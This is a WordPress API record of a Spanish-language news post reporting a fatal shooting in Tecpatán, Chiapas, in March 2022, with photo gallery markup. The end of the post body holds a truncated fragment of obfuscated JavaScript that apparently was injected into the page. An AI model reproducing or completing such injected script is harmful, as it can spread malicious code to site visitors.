{"id":230,"date":"2022-03-07T05:20:08","date_gmt":"2022-03-07T05:20:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=230"},"modified":"2022-03-07T05:20:09","modified_gmt":"2022-03-07T05:20:09","slug":"balacera-en-tecpatan-deja-un-hombre-sin-vida","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=230","title":{"rendered":"Balacera en Tecpat\u00e1n deja un hombre sin vida"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"232\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0025-768x1024.jpg\" alt=\"\" class=\"wp-image-232\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0025-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0025-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0025.jpg 864w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"766\" height=\"1024\" data-id=\"231\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0024-766x1024.jpg\" alt=\"\" class=\"wp-image-231\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0024-766x1024.jpg 766w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0024-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0024-768x1026.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0024.jpg 958w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"234\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646629540145-1-768x1024.jpg\" alt=\"\" class=\"wp-image-234\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646629540145-1-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646629540145-1-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646629540145-1.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"233\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0023-576x1024.jpg\" alt=\"\" class=\"wp-image-233\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0023-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0023-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220306-WA0023.jpg 720w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 6 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la noche un ataque dej\u00f3 a un hombre sin vida.<\/p>\n\n\n\n<p>De acuerdo con el reporte extraoficial todo ocurri\u00f3 por un ajuste de cuentas, en el que un grupo de hombres intercept\u00f3 un sujeto en las calles de lugar y le dispararon a quemarropa.<\/p>\n\n\n\n<p>Hasta el momento no existe versi\u00f3n oficial de los hechos, ni mayores datos sobre los atacantes.<\/p>\n\n\n\n<p>La v\u00edctima fue identificado como El Gavil\u00e1n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 6 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la noche un ataque dej\u00f3 a un hombre sin vida. De acuerdo con el reporte extraoficial todo ocurri\u00f3 por un ajuste de cuentas, en el que un grupo de hombres intercept\u00f3 un sujeto en las calles de lugar y le &hellip;<\/p>\n","protected":false},"author":2,"featured_media":231,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-230","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=230"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/230\/revisions"}],"predecessor-version":[{"id":235,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/230\/revisions\/235"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/231"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=230"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=230"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}